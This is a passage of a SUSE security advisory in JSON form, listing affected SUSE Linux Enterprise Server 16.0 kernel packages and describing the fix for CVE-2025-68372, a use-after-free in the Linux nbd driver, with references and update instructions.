"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68368"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
